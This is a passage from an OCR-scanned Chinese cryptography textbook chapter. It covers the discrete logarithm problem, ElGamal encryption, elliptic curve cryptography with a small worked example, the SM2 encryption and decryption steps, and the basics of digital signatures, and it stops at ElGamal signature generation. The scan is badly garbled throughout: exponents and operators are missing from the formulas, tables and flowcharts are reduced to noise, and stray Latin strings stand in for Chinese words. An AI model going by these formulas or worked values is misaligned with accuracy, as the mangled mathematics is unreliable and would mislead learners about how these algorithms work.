2.5.3.1 ElGamal 密码 体制 的 数学 基础 

设 为 素数 ， 若 存在 一 个 正 整数 a， 使 得 a，a，w，…，of'， 关 于 模 p 互 不 同 余 ， 
则 称 a 为 模 的 本 原 元 。 显 而 易 见 车 a 为 模 p 的 本 原 元 ， 则 对 于 yE {1,2,3,…p-1} 一 定 
存在 一 个 正 整数 x， 使 得 JEo mod p. 


于 是 我 们 有 如 下 的 运算 : 
设 p 为 素数 ，a 为 模 p 的 本 原 元 ，a 的 窜 乘 运算 为 
y=a mod p, 1<x<p-l (2-44) 
则 称 x 为 以 a 为 底 的 模 p 的 对 数 。 求 解 对 数 x 的 运算 为 
x=logay, 1<y<p-1 (2-45) 


由 于 上 述 运算 是 定义 在 模 p 有 限 域 上 的 ， 所 以 称 为 离散 对 数 运算 。 
从 x 计算 y 是 容易 的 ， 至 多 需要 2xlogzp 次 乘法 运算 。 可 是 从 y 计 算 x 就 困难 得 多 ， 
目前 已 知 最 快 的 求解 离散 对 数 算法 的 时 间 复杂 度 为 : 


O(exp((In p)? In(in p))*) 
可 见 ， 只 要 p 足够 大 ， 求 解 离 散 对 数 问题 是 相当 困难 的 。 这 便 是 著名 的 离散 对 数 问 
题 。 可 见 ， 离 散 对 数 问题 具有 较 好 的 单 向 性 。 
由 于 离散 对 数 问题 具有 较 好 的 单 向 性 ， 所 以 离散 对 数 问题 在 公 钥 密码 学 中 得 到 广泛 
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应 用 。 除 了 ElGamal 密码 外 , Diffie-Hellman 密 钥 分 配 协议 和 美国 数字 签名 标准 算法 DSA 
等 也 都 是 建立 在 离散 对 数 问题 之 上 的 。 
2.5.3.2 ”基本 的 ElGamal 密码 体制 : 参数 ， 加 密 算法 ， 解 密 算法 

ElGamal 改进 了 Diffie 和 Hellman 的 基于 离散 对 数 的 密 钥 分 配 协议 ， 提 出 了 基于 离 
散 对 数 的 公开 密 钥 密码 和 数字 签名 体制 。 

随机 地 选择 一 个 大 素数 p， 且 要 求 p-1 有 大 素数 因子 。 再 选择 一 个 模 p 的 本 原 元 a。 
将 p 和 a 公开。 

1. BAER 

用 户 随 机 地 选择 一 个 整数 4 作为 自己 的 秘密 的 解密 钥 , 1<4<p-1, 计算 y=a mod p, 
取 ? 为 自己 的 公开 的 加 密 钥 。 

由 公开 钥 y 计算 秘密 钥 4， 必 须 求解 离散 对 数 ， 而 这 是 极 困 难 的 。 

2. 加密 

将 明文 消息 M(0<sM<p-1) 加 密 成 密 文 的 过 程 如 下 : 

O 随机 地 选取 一 个 整数 k，1<k<p-1。 


回 计算 U=y*mod p (2-46) 
Ci=a" mod p (2-47) 
CUM mod p (2-48) 
© 取 (Ci, Cr) 作为 的 密 文 。 
3. 解密 
HEX (Ci, C) 解密 的 过 程 如 下 : 
@ 计算 大 Ci*mod p (2-49) 
@ its M=C, V' mod p (2-50) 
解密 的 可 还 原 性 可 证 明 如 下 : 
因为 ， 
CVimod p=(UM)V' mod p 
=UM (Gô) mod p 
=UM ((a‘) © mod p 
=UM ((a®) *) mod p 
=UM ((y) *) "mod p 
=UM (U) ~™ mod P 
=M_mod p 
故 解 密 可 还 原 。 


例 2-3 W p=2579, WH a=2, BLE 夺 765， 计 算出 公开 钥 y=2 mod 2579=949。 
再 取 明 文 M=1299， 随 机 数 k=853, M) C="? mod 2579=435, C, =1299x949%* mod 
2579=2396， 所 以 密 文 为 (Ci，C) = (435，2396)。 解 密 时 计算 


a 
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W 


1 


M=2396x (4357) — mod 2579=1299 

从 而 还 原 出 明文 。 
2.5.3.3 ”基本 ElGamal 密码 的 安全 性 

由 于 ElGamal 密码 的 安全 性 建立 在 GF (p) 离散 对 数 的 困难 性 之 上 ， 而 目前 尚 无 求 
fi GF (Cp) 离散 对 数 的 有 效 算法 ， 所 以 在 p 足够 大 时 ElGamal 密码 是 安全 的 。 为 了 安全 
了 应 为 150 位 以 上 的 十 进 制 数 ， 而 且 p-l 应 有 大 素 因 子 。 因 为 p 为 大 素数 ，p-1 为 偶数 ， 
p- 一 定 有 因子 2。 我 们 希望 除了 因子 2 外 ， 其 余 因 子 为 大 素数 因子 。 理 想 情 况 是 p 为 
强 素数 ，p-1=2qg， 其 中 9 为 大 素数 。 

为 了 安全 加 密 所 使 用 的 必须 是 一 次 性 的 。 另 外 虽然 理论 上 解密 钥 q 的 选择 范围 为 
l<d<p-1, {HE d 选 的 太 小 或 太 大 都 不 好 。 因 为 攻击 者 在 用 穷 举 方法 猜测 d 时 ， 一 般 会 
首先 试验 太 小 或 太 大 的 4。 同 理 ， 随 机 数 也 不 要 选 得 太 小 或 太 大 。 随 机 数 的 选择 还 
要 保证 按 式 (2-46) 计算 的 Umodpz#1。 如 果 Umodp=1， 则 根据 式 (2-48) 可 知 ，Cs=M， 
从 而 暴露 明文 M。 


2.5.4 椭圆 曲线 密码 


人 们 对 椭圆 曲线 的 研究 已 有 100 多 年 的 历史 ， 而 椭圆 曲线 密码 ECC (Elliptic Curve 
Cryptosysytem ) 是 Koblitz 和 Miller 于 20 世纪 80 年 代 提 出 的 。ElGamal 密码 是 建立 在 有 
限 域 GF (p) 之 上 的 ， 其 中 p 是 一 个 大 素数 ， 这 是 因为 有 限 域 GF Cp) 的 乘法 群 中 的 离 
散 对 数 问题 是 难 解 的 。 受 此 启发 ， 在 其 他 任何 离散 对 数 问题 难 解 的 群 中 ， 同 样 可 以 构成 
ElGamal 密码 。 于 是 人 们 开始 寻找 其 他 离散 问题 难 解 的 群 。 研 究 发 现 ， 有 限 域 上 的 椭圆 
曲线 上 的 一 些 点 构成 交换 群 , 而 且 离 散 对 数 问题 是 难 解 的 ,于 是 可 在 此 群 上 定义 ElGamal 
密码 ， 并 称 为 椭圆 曲线 密码 。 目 前 , 椭圆 曲线 密码 已 成 为 除 RSA 密码 之 外 呼声 最 高 的 公 
钥 密码 之 一 。 它 密 钥 短 、 签 名 短 ， 软 件 实现 规模 小 、 硬 件 实现 电路 省 电 。 普 遍 认 为 ，160 
位 长 的 椭圆 曲线 密码 的 安全 性 相当 于 1024 位 的 RSA 密码 ， 而 且 运 算 速 度 也 较 快 。 正 因 
如 此 ， 一 些 国际 标准 化 组 织 已 把 椭圆 曲线 密码 作为 新 的 信息 安全 标准 。 如 ，IEEE 
P1363/D4, ANSI F9.62, ANSI F9.63 等 标准 ， 分 别 规范 了 椭圆 曲线 密码 在 Internet 协议 
安全 、 电 子 商 务 、Web 服务 器 、 空 间 通信 、 移 动 通信 、 智 能 卡 等 方面 的 应 用 。 
2.5.4.1 ”椭圆 曲线 的 基本 概念 

椭圆 曲线 并 不 是 椭圆 ， 之 所 以 称 为 椭圆 曲线 是 因为 它们 与 计算 椭圆 周 长 的 方程 相 
似 。 椭 圆 曲 线 可 以 定义 在 不 同 的 有 限 域 上 ， 对 我 们 最 有 用 的 是 定义 在 GF (p) 上 的 椭圆 
1 线 和 定义 在 GF (2) 上 的 椭圆 曲线 。 下 面 介绍 GF (p) 上 的 椭圆 曲线 。 

定义 2.1 设 p 是 大 于 3 的 素数 ， 且 4a°+27b'40 modp， 称 曲线 
y =x taxth, a,b E GFP) (2-51) 


为 GF (p) 上 的 椭圆 曲线 。 
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由 椭圆 曲线 可 得 到 一 个 同 余 方程 : 
y=xtaxtbh modp (2-52) 
其 解 为 一 个 二 元 组 xy)， 其 中 xyEGFO)， 将 此 二 元 组 描画 到 椭圆 曲线 上 便 为 一 个 
于 是 又 称 其 为 解 点 。 
为 了 利用 解 点 构成 交换 群 ， 需 要 引进 一 个 0 元 素 ， 并 定义 如 下 的 加 法 运算 : 
@ 引进 一 个 无 穷 点 O lo, o), HA O, EA 0 元 素 。 
O (œ, œ) +O (wo, ©) =0 十 0=0 (2-53) 
并 定义 对 于 所 有 的 解 点 P (x y), 
P (x, y) +O=O+P (x, y) =P (x, y) (2-54) 
© BP (rm y) 和 Q (eo, y) ERA, WR xx H y5 -yz W 
P (ms y) +Q (xm, y2) =0 (2-55) 
这 说 明 任 何 解 点 R(x ，y) 的 道 就 是 R (x，-y)。 
© RP (x, yı) lO (2, y2) 是 解 点 ， 如 果 PALO, 则 
P (xs y1) +Q Cx, y2) =R (x3, y3) 


m 


其 中 
x, =2? -x,-2x, 
V3 =A) (2-56) 
gee) 
(% —%) 
(4) 4P On, y1) =O Gr, y2) 时 ， 
P Gi, yw) 十 CQ Ga, y2) =2P Gr, y1) SR Crs, ys) 
其 中 
x, =A? -2x4 
V3 =A —33)— 
gusta 
2y, 


(2-57) 


WERE E={ 全 体 解 点 ， 无 穷 点 0 }。 

可 以 验证 ， 如 上 定义 的 集合 E 和 加 法 运算 构成 加 法 交换 群 。 

椭圆 曲线 及 其 解 点 的 加 法 运算 的 几何 意义 如 图 2-35 所 示 。 

R P (Hp yı) 和 Q (x2, yo) 是 椭圆 曲线 的 两 个 点 ， 则 连接 Poy «i 和 
Q Co, y) 的 直线 与 椭圆 曲线 的 另 一 交点 关于 横 轴 的 对 称 点 即 为 P (xz ，J) +Q Oras 
JP) Filo 


Hog 
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图 2-35 椭圆 曲线 及 其 点 的 相 加 


例 2-4 取 p=11， WEAH y = +x+6 。 由 于 p 较 小 ， 使 GF(p) 也 较 小 ， 故 可 以 利 
用 穷 举 的 方法 根据 式 (2-54) 求 出 所 有 解 点 。 穷 举 过 程 如 表 2-12 所 示 。 


表 2-12 椭圆 曲线 y =x +x+6 的 解 点 
x°+x+6 mod 11 是 否 模 11 平方 剩余 y 


wClolrlafuJalwlrn|[elo|x 


EE 
a 
N 
io 


= 
© 


Yes 29 


@ 根据 表 2-12 可 知 全 部 解 点 集 为 : { (2, 4), (2, 7), G, 5), G, 6), (5, 2), 
(5, 9), (7, 2), (7, 9), (8, 3), (8, 8), C10, 2), C10, 9) }. FEIN EAA O, 
JE 13 的 点 构成 一 个 加 法 交换 群 。 

@ 由 于 群 的 元 素 个 数 为 1 3， 而 13 为 素数 ， 所 以 此 群 是 循环 群 ， 而 且 任何 一 个 非 O 
元 素 都 是 生成 元 。 

@ 由 于 是 加 法 群 ，n 个 元 素 G 相 加 ，G+G+…+G=nG。 我 们 取 G= (2, 7) 为 生成 
元 ， 具 体 计 算 加 法 表 如 下 : 

2G= (2, 7) + (2, 7) = (5, 2), 这 是 因为 和 = (3x21) (2x7) mod 11 =2x3 mod 
11=2x4 mod 11=8 。 于 是 ，x3 =87-2-2 mod 11=5 ， ¥3=8 (2-5) -7mod 11=2. 

经 过 类 似 计算 ， 最 后 得 : 

全 三 

3G= (8, 3), 4G= (10, 2) 
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5G= (3, 6), 6G= (7, 9) 

1G= (7, 2), 8G= (3, 5) 

9G= (10, 9), 10G= (8, 8) 

11G= (5, 9), 12G= (2, 4) 

13G=12G+G= (2, 4) + (2, 7) =O 

由 此 显然 可 知 ， 全 部 解 点 加 上 无 穷 远 点 OMNEA{O, G, 2G, 3G, 4G, 5G, 6G, 
7G，8G，9G，10G，11G，12G} 构 成 循环 群 ， 其 中 任何 一 个 非 零 元 素 都 是 生成 元 。 

例 2-S p=5 时 ，GFCO) 上 的 一 些 椭圆 曲线 的 解 点 数 (包含 无 穷 远 点 ) 如 表 2-13 所 示 。 


表 2-13 GF(5) 上 的 一 些 椭圆 曲线 的 解 点 数 


ran 
am ee | 


在 以 上 例 中 ， 由 于 参数 p 较 小 ， 使 得 有 限 域 GF(p) 也 较 小 ， 故 可 以 利用 穷 举 的 方法 
求 出 所 有 解 点 。 但 是 ， 对 于 一 般 情 况 要 确切 计算 椭圆 曲线 解 点 数 N 的 准确 值 比较 困难 。 
研究 表明 ， 满足 以 下 不 等 式 

P+1-2P"°<N<P+1+2P"° (2-58) 
IR (2-58) 给 出 椭圆 曲线 解 点 数 的 计数 范围 。 

虽然 确切 计算 椭圆 曲线 解 点 数 N 的 准确 值 比 较 困 难 , 但 是 已 有 一 个 比较 有 效 的 算法 
来 计算 它 。 目 前 已 经 能 够 有 效 计算 p KEL 10 H GF (Cp) 上 的 椭圆 曲线 解 点 数 和 m 大 
到 601 的 GF (2") 上 的 椭圆 曲线 解 点 数 。 

为 了 能 够 利用 椭圆 曲线 构成 安全 的 椭圆 曲线 密码 ， 必 须 选 用 好 的 椭圆 曲线 。 所 谓 好 
的 椭圆 曲线 是 指 ， 据 此 曲线 构成 的 椭圆 曲线 密码 是 安全 的 ， 而 且 运 算是 快速 的 。 
2.5.4.2 ”椭圆 曲线 上 的 EIGamal 密码 体制 

ElGamal 密码 建立 在 有 限 域 GF (p) 的 乘法 群 的 离散 对 数 问 题 的 困难 性 之 上 。 而 椭 
圆 曲线 密码 建立 在 椭圆 曲线 解 点 群 的 离散 对 数 问题 的 困难 性 之 上 。 两 者 的 主要 区 别 是 其 
离散 对 数 问题 所 依赖 的 群 不 同 。 因 此 两 者 有 许多 相似 之 处 。 

1. 椭圆 曲线 解 点 群 上 的 离散 对 数 问题 

在 例 2-4 中 , 椭圆 曲线 上 的 解 点 所 构成 的 交换 群 恰好 是 循环 群 , 但 是 一 般 并 不 一 定 。 
于 是 我 们 希望 从 中 找 出 一 个 子 群 E, TOE E 是 循环 群 。 可 以 证 明 当 循 环 子 群 E 的 
阶 | 好 | 是 足够 大 的 素数 时 ， 这 个 循环 子 群 中 的 离散 对 数 问题 是 困难 的 。 

设 己 和 @ 是 椭圆 曲线 上 的 两 个 解 点 ，! 为 一 正 整数 ， 且 1<t< |E | 。 对 于 给 定 的 P 


RA 
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Alt, 计算 P=O 是 容易 的 。 但 车 已 知 P 和 0 点 ， 要 计算 出 1 则 是 极 困难 的 。 这 便 是 椭圆 
H 线 解 点 群 上 的 离散 对 数 问题 ， 简 记 为 ECDLP(Elliptic Curve Discrete Logarithm 
Problem). 

除了 几 类 特殊 的 椭圆 曲线 外 ， 对 于 一 般 ECDLP 目前 尚 没有 找到 有 效 的 求解 方法 。 
于 是 可 以 在 这 个 循环 子 群 了 中 建立 任何 基于 离散 对 数 困难 性 的 密码 , 并 称 这 个 密码 为 椭 
圆 曲线 密码 。 据 此 ， 诸 如 ElGamal #744. Diffie-Hellman 密 钥 分 配 协议 ， 美 国 数字 签名 标 
HE DSS 等 许多 基于 离散 对 数 问题 的 密码 体制 都 可 以 在 椭圆 曲线 群 上 实现 。 我 们 称 这 一 类 
椭圆 曲线 密码 为 EIGamal 型 椭圆 曲线 密码 。 后 来 又 有 人 将 椭圆 曲线 密码 推广 到 环 Zy 上 
(n=pq)， 这 类 椭圆 曲线 密码 的 安全 性 依赖 于 对 大 合 数 n 的 因子 分 解 ， 所 以 被 称 为 RSA 
型 椭圆 曲线 密码 。 于 是 就 有 众多 的 椭圆 曲线 密码 方案 。 不 过 ， 一 般 谈 到 椭圆 曲线 密码 大 
多 是 指 ElGamal 型 椭圆 曲线 密码 。 在 这 里 我 们 只 讨论 ElGamal 型 椭圆 曲线 密码 。 

在 SEC 1 的 椭圆 曲线 密码 标准 (草案 ) 中 规定 ， 一 个 椭圆 曲线 密码 由 下 面 的 六 元 组 
所 描述 : 


T=<p, a, b, G, n, h> (2-59) 
其 中 , p 为 大 于 3 素数 ,，p 确定 了 有 限 域 GF (p); 元 素 abeGF(p), a 和 5 确定 了 椭圆 
曲线 ，G 为 循环 子 群 El 的 生成 元 , n 为 素数 且 为 生成 元 G 的 阶 ，G All 确定 了 循环 子 群 
E,; h=|El/n， 并 称 为 余 因 子 ，h 将 交换 群 E 和 循环 子 群 联系 起 来 。 
用 户 的 私 钥 定 义 为 一 个 随机 数 d, 
dE{l, 2, =, n-l} (2-60) 
用 户 的 公开 钥 定义 为 2 点 ， 
O=dG (2-61) 
2. ElGamal 型 椭圆 曲线 密码 
为 了 构建 椭圆 曲线 密码 ， 首 先 要 根据 式 (2-59) 建立 椭圆 曲线 密码 的 基础 结构 ， 为 
构造 具体 的 密码 体制 奠定 基础 。 这 里 包括 选择 一 个 素数 p， 从 而 确定 有 限 域 GF (p); 选 
FETCH a,bE GF(p)， 从 而 确定 一 条 GF(p) 上 的 椭圆 曲线 ， 选 择 一 个 大 素数 nm， 并 确定 一 
个 阶 为 n 的 基点 。 基 础 参数 p,a,b,G,n,h 是 公开 的 。 
根据 式 (2-60)， 随 机 地 选择 一 个 整数 4， 作 为 私 钥 。 
再 根据 (2-61) 确定 出 用 户 的 公开 钥 Q- 
设 要 加 密 的 明文 数据 为 m， 其 中 0<m<n。 设 用 户 A 要 将 数据 m 加 密 发 送 给 用 户 B， 
其 加 解密 过 程 如 下 : 
加 密 过 程 : 
© 用 户 A 去 查 公 钥 库 PKDB， 查 到 用 户 B 的 公开 密 钥 Qe。 
@ 用 户 A 选择 一 个 随机 数 k H kE{1, 2, …，n-1}。 
© AP ATHAM : On, yı) kG. 
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© HP ARAD: (x, y2) =kQp, 如 果 分 量 m=O, 则 转 @。 

© 用 户 A 计 算 C=mxs modn 。 

© 用 户 A 发 送 加 密 数 据 OG, O 给 用 户 B。 

解密 过 程 : 

© 用 户 B 用 自己 的 私 钥 ds RHA X : 

dX = dg (kG) =k(dg G)=k Q= X2: (x2 , y2)。 

@ RAMEE x (iE 

@ 对 C 解 密 ， 得 到 明文 数据 m=C x. mod n. 

类 似 地 ， 可 以 构成 其 他 椭圆 曲线 密码 。 

与 ElGamal 密码 一 样 ， 为 了 安全 ， 加 密 所 使 用 的 必须 是 一 次 性 的 。 这 是 因为 ， 如 
果 使 用 的 上 不 是 一 次 性 的 ,时间 长 了 就 可 能 被 攻击 者 获得 。 又 因 On 是 公开 密 钥 ,攻击 者 
自然 知道 。 于 是 攻击 者 就 可 以 计算 出 点 玖 ， 获 得 分 量 钱 ， 进 而 求 出 区-!。 又 因为 攻击 者 
可 以 获得 密 文 C， 于 是 可 以 计算 C xz mod n 得 到 明文 m。 

同样 ， 解 密 钥 d 选 得 太 小 或 太 大 都 不 好 。 因 为 攻击 者 在 用 穷 举 方法 猜测 d 时 ， 一 般 
会 首先 试验 太 小 或 太 大 的 d。 同 理 ， 随 机 数 k 也 不 要 选 得 太 小 或 太 大 。 随 机 数 大 的 选择 
BERTIE XD (ZL Xd mod n žl. WRX mod n=l, IHRE C=mX=m mod n, 
从 而 暴露 明文 m。 
2.5.4.3 ”椭圆 曲线 密码 的 安全 性 

椭圆 曲线 密码 的 安全 性 建立 在 椭圆 曲线 离散 对 数 问 题 的 困难 性 之 上 。 目 前 求解 椭圆 
曲线 离散 对 数 问题 的 最 好 算法 是 分 布 式 Pollard-p 方法 , 其 计算 复杂 性 为 O((rm/2) /im)， 
其 中 是 群 的 阶 的 最 大 素 因 子 ，m 是 该 分 布 式 算法 所 使 用 的 CPU 的 个 数 。 可 见 当 素数 p 
入 n 足够 大 时 椭圆 曲线 密码 是 安全 的 。 这 就 是 要 求 椭 圆 曲 线 解 点 群 的 阶 要 有 大 素数 因子 
的 根本 原因 ， 在 理想 情况 下 群 的 阶 本 身 就 是 一 个 素数 。 

普遍 认为 ，160 位 长 的 椭圆 曲线 密码 的 安全 性 相当 于 1024 位 的 RSA 密码 。 椭 圆 曲 
线 密码 的 基本 运算 比 RSA 密码 的 基本 运算 复杂 得 多 , 正 是 因为 如 此 , 所 以 椭圆 曲线 密码 
的 密 钥 可 以 比 RSA 的 密 钥 短 。 密 钥 越 长 ， 自 然 越 安 全 ， 但 是 技术 实现 也 就 越 困 难 ， 效 率 
也 就 越 低 。 一 般 认为 ， 在 目前 的 技术 水 平 下 采用 160~200 位 的 椭圆 曲线 ， 其 安全 性 就 
wT. 

由 于 椭圆 曲线 密码 的 密 钥 位 数 短 ， 在 硬件 实现 中 电路 的 规模 小 ， 省 电 。 因 此 椭圆 曲 
线 密码 特别 适 于 在 航空 、 航 天 、 卫 星 及 智能 卡 中 应 用 。 


2.5.5 SM2 椭圆 曲线 公 钥 加 密 算 法 

SM2 算法 是 国家 密码 管理 局 于 2010 年 12 月 17 日 发 布 的 椭圆 曲线 公 钥 密码 算法 。 
在 我 们 国家 商用 密码 体系 中 被 用 来 替换 RSA 算法 。 

基本 的 椭圆 曲线 系统 参数 包括 有 限 域 F 的 规模 qg ( 当 g=2” 时 ， 还 包括 元 素 表示 法 


io 


al 
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的 标识 和 约 化 多 项 式 ) ; 定义 椭圆 曲线 E(Fy) 的 方程 的 两 个 元 素 a、b EFy; E(Fy) 上 的 基 
点 G-(xGyG)(G#0)， 其 中 xG 和 yG 是 Fy 中 的 两 个 元 素 ; G 的 阶 n 及 其 他 可 选项 (如 n 
的 余 因 子 h 等 )。 

1. SM2 椭圆 曲线 密码 加 密 流程 

设 需 要 发 送 的 消息 为 比特 串 M, klen 为 M 的 比特 长 度 。 为 了 对 明文 M 进行 加 密 ， 
如 图 2-36 所 示 ， 作 为 加 密 者 的 用 户 A 应 实现 以 下 运算 步 又 : 


用 户 A 的 原始 数据 
(椭圆 曲线 系统 参数 、 长 度 为 klen 比特 的 消息 M、 公 和 钥 Ps) 


| 


| @ PERIL KEL, n-1] 


© 计算 椭圆 曲线 点 C= 内 GC=Ga y) 


1 


© 计算 椭圆 曲线 点 S =[h]Ps 


= 


否 


图 HKR = (3.92) 


1 


© 计算 KDF(xlbyz.klen) 


i 


否 
© 计算 G-Mer 


© 计算 C=Hash(ellMiy) 


1 了 
输出 密 文 C=CillCzllC3 报错 并 退出 


图 2-36 SM2 加 密 算 法 流程 


© 用 随机 数 发 生 器 产生 随机 数 E[1,n-1]; 

© 计算 椭圆 曲线 点 C=[ 有 G6=(x1y1)， 并 将 Ci 的 数据 类 型 转换 为 比特 串 ; 
© 计算 椭圆 曲线 点 $=[hljPs， 车 S 是 无 穷 远 点 ， 则 报错 并 退出 ; 

© 计算 椭圆 曲线 点 [有 Pg-=(x2wy2)， 将 坐标 x2. yo 的 数据 类 型 转换 为 比特 串 ; 


第 2 章 emesis 145 


© 计算 所 KDF(w2 ||yz, klen)， 若 1 为 全 0 比特 串 ， 则 返回 Q@; 

© 计算 C=Mei; 

© 计算 C3 = Hash || M || y2); 

Hat BE C=C, || C |l Cae 

2. SM2 椭圆 曲线 密码 解密 流程 

设 klen 为 密 文 中 C 的 比特 长 度 . 为 了 对 密 文 C=CallCzllCs 进行 解密 ,如 图 2-37 所 示 ， 
作为 解密 者 的 用 户 B 应 实现 以 下 运算 步骤 : 


用 户 B 的 原始 数据 
(椭圆 曲线 系统 参数 、 密 文 C=C1llCsllC3、 私 钥 ds) 


i 


® 从 密 文中 取出 C 


验证 Ci 是 否 满足 曲线 方程 


© 计算 椭圆 曲线 点 S=[h]C, 


= 是 
否 
© 计算 [ds]Ci=(w2w3y2) 


1 
® 计算 二 KEDFGColbzklen) 


tf 是 否 全 0 = 


JE 


© 计算 M=Cze@r 


1 
© HË w=Hash(x||M'||y2) 


u=C3? 


1 是 1 
© 和 输出 明文 报错 并 退出 


图 2-37 SM2 解密 算法 流程 


Woh 
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© 从 C 中 取出 比特 串 Ci， 将 Ci 的 数据 类 型 转换 为 椭圆 曲线 上 的 点 ， 验 证 Ci 是 否 
满足 椭圆 曲线 方程 ， 若 不 满足 则 报错 并 退出 ; 

@ 计算 椭圆 曲线 点 S=[h]C!:， 若 5 是 无 穷 远 点 ， 则 报错 并 退出 ; 

© 计算 [4s]Ci=Gx2,y2)， 将 坐标 x2、y2 的 数据 类 型 转换 为 比特 串 ; 

@ IHH KDF: || yz klen), #7 tAE O 比特 串 ， 则 报错 并 退出 ; 

© 从 C 中 取出 比特 串 CG， 计算 M'= C2 et; 

© H u=Hash@ Mo)， 从 C 中 取出 比特 串 C3， 若 好 Cs， 则 报错 并 退出 ; 

© 输出 明文 M'。 


26 ”数字 签名 
2.6.1 数字 签名 的 概念 


2.6.1.1 ”数字 签名 的 用 途 

在 人 们 的 工作 和 生活 中 ， 许 多 事物 的 处 理 需 要 当事者 签名 。 签 名 起 到 确认 、 核 准 、 
生效 和 负责 任 等 多 种 作用 。 签 名 是 证 明 当 事 者 的 身份 和 数据 真实 性 的 一 种 信息 。 签 名 可 
以 用 不 同 的 形式 来 表示 。 在 传统 的 以 书面 文件 为 基础 的 事物 处 理 中 ， 采 用 书面 签名 的 形 
式 : 手 签 、 印 章 、 手 印 等 ， 书 面 签 名 得 到 司法 部 门 的 支持 。 在 以 计算 机 文件 为 基础 的 现 
代 事 物 处 理 中 ， 应 采用 电子 形式 的 签名 ， 即 数字 签名 (Digital Signature )。 数 字 签 名 已 得 
到 一 些 国家 的 法 律 支持 。 

一 种 完善 的 签名 应 满足 以 下 三 个 条 件 : 

@ 签名 者 事后 不 能 抵赖 自己 的 签名 ; 

@ 任何 其 他 人 不 能 伪造 签名 ; 

@ 如 果 当 事 的 双方 关于 签名 的 真 伪 发 生 争执 ， 能 够 在 公正 的 仲裁 者 面前 通过 验证 
签名 来 确认 其 真 伪 。 
2.61.2 ”数字 签名 的 基本 模型 

一 个 数字 签名 体制 包括 两 个 方面 的 处 理 : 施加 签名 和 验证 签名 。 

设施 加 签名 的 算法 为 SSG， 产生 签名 的 密 钥 为 及， 被 签名 的 数据 为 M， 产 生 的 签名 
信息 为 s， 则 有 


SIG (M, K)=S 
设 验证 签名 的 算法 为 VER ， 用 VER 对 签名 S 进行 验证 ， 可 鉴别 5 的 真 假 。 即 
签名 为 真 ， 当 S=SIG(M, K): 
签名 为 假 ， 当 SASIG(M, K). 
2.6.1.3 ”数字 签字 的 安全 性 
签名 函数 必须 满足 以 下 条 件 ， 否 则 文件 内 容 及 签名 被 算 改 或 冒充 均 无 法 发 现 : 
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®© 4 MYM, 4 SIG(M', K)#SIG (M, K)» 

条 件 中 要 求 签名 S 至 少 和 被 签名 的 数据 M 一 样 长 。 当 M 较 长 时 ， 应 用 很 不 方便 。 
将 条 件 @ 改 为 : 虽然 当 MZM 时 ， 存 在 S=S'， 但 对 于 给 定 的 M 或 S， 要 找 出 相应 的 MM' 
在 计算 上 是 不 可 能 的 。 

@ 签名 5S 只 能 由 签名 者 产生 ， 否 则 别人 便 可 伪造 ， 于 是 签名 者 也 就 可 以 抵赖 。 

© 收 信者 可 以 验证 签名 8 的 真 伪 。 这 使 得 当 签 名 s 为 假 时 收 信者 不 致 上 当 。 

@ 签名 者 也 应 有 办 法 鉴别 收 信者 所 出 示 的 签名 是 否 是 自己 的 签名 。 这 就 给 签名 者 
以 自卫 的 能 力 。 

对 于 一 个 公 钥 密码 ， 如 果 满 足 

E (D (M, Ka), Ke) =M, 

则 可 确保 数据 的 真实 性 。 

凡是 能 够 确保 数据 的 真实 性 的 公开 密 钥 密码 都 可 用 来 实现 数字 签名 ， 例 如 RSA 密 
码 、ElGamal 密码 、 椭 圆 曲 线 密码 ECC 等 都 可 以 实现 数字 签名 。 

签名 通信 协议 A 一 B 

© A 用 自己 的 解密 钥 Ka 对 数据 M 进行 签名 : 

Si =D (M, Kas) 

@ 如 果 不 需要 保密 ， 则 A 直接 将 Sy 发 送 给 用 户 B。 

@ 如 果 需 要 保密 ， 则 A 查 到 B 的 公开 的 加 密 钥 Kes ， 并 用 Ken 对 S 再 加 密 ， 得 
到 密 文 C， 


人 
@ 最 后 ，A 把 C 发 送 给 B， 并 将 &% 或 C 留 底 。 
© B 收 到 后 ， 若 是 不 保密 通信 ， 则 先 查 到 A 的 公开 加 密 钥 Ke ， 然 后 用 Kea 对 签 
名 进行 验证 : 
E (Su, Kea) =E (D (M, Kas), Kea) M 
© 若是 保密 通信 ， 则 B 先 用 自己 的 保密 的 解密 钥 Kas 对 C 解密 ， 然 后 再 查 到 A 的 
公开 加 密 钥 Kea ， 用 Kea 对 签名 进行 验证 : 
D (C, Kæ) =D (E (Sa, Kes), Kaz) = Sa 
E (Sg, Kea) =E (D (M, Ka), Ka) =M 
如 果 能 够 恢复 出 正确 的 M， 则 说 明 Sa A 的 签名 ， 否 则 Sy 不 是 A 的 签名 。 
签名 通信 协议 安全 分 析 : 
@ 因为 只 有 A AVA Ka ， 而 且 由 公开 的 Kes 在 计算 上 不 能 求 出 保密 的 解密 
钥 Ka 。 因 此 签名 的 操作 只 有 A 才能 进行 ， 任 何其 他 人 都 不 能 进行 。 所 以 ，Kas 就 相 
当 于 A 的 印章 或 指纹 , 而 Sa 就 是 A 对 M 的 签 名。 对 此 A 不 能 抵赖 , 任何 其 他 人 不 能 伪 


ea | 


ish 
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造 。 
@ 事后 如 果 A 和 B 关于 签名 的 真 伪 发 生 争执 ， 则 他 们 应 向 公正 的 仲裁 者 出 示 留 底 
的 签名 数据 ， 由 仲裁 者 当众 验证 签名 ， 解 决 纠纷 。 


2.6.2 ”典型 数字 签名 体制 


2.6.2.1 基本 的 RSA 签名 体制 算法 与 安全 性 

对 于 RSA 密码 

DEMEM =M” =M) =E(D(M)) mod n 

所 以 RSA 可 同时 确保 数据 的 秘密 性 和 真实 性 。 

因此 利用 RSA 密码 可 以 同时 实现 数字 签名 和 数据 加 密 。 

WM HHX, Kea =<e,n> 是 A 的 公开 钥 ，Ka=<dp,9g.9(0)> 是 A 的 保密 的 私 钥 ， 则 A 
对 M 的 签名 过 程 是 : 

S4=D(M, Ka)= (M° ) mod n 
Sa 便 是 4 对 M 的 签名 。 
验证 签名 的 过 程 是 : 
E (Sq, Kes) = (M )。 mod n=M 

确保 数字 签名 的 安全 需要 注意 : 不 对 数据 M 签名 , 而 是 对 HASH(M) 签 名 ; 使 用 时 
间 戳 ， 对 于 同时 确保 秘密 性 和 真实 性 的 通信 ， 应 当先 签名 后 加 密 。 
2.6.2.2 ”基本 的 ElGamal 签名 体制 算法 与 安全 性 

1， 密 钥 选 择 

O 选 已 是 一 个 大 素数 , p-1 有 大 素数 因子 , a 是 一 个 模 p 的 本 原 元 , 将 p 和 a 公开 。 

© 用 户 随机 地 选择 一 个 整数 x 作为 自己 的 秘密 的 解密 钥 ，1<x<p-2。 

© 计算 y=a modp， 取 ?为 自己 的 公开 的 加 密 钥 。 

2. 产生 签名 

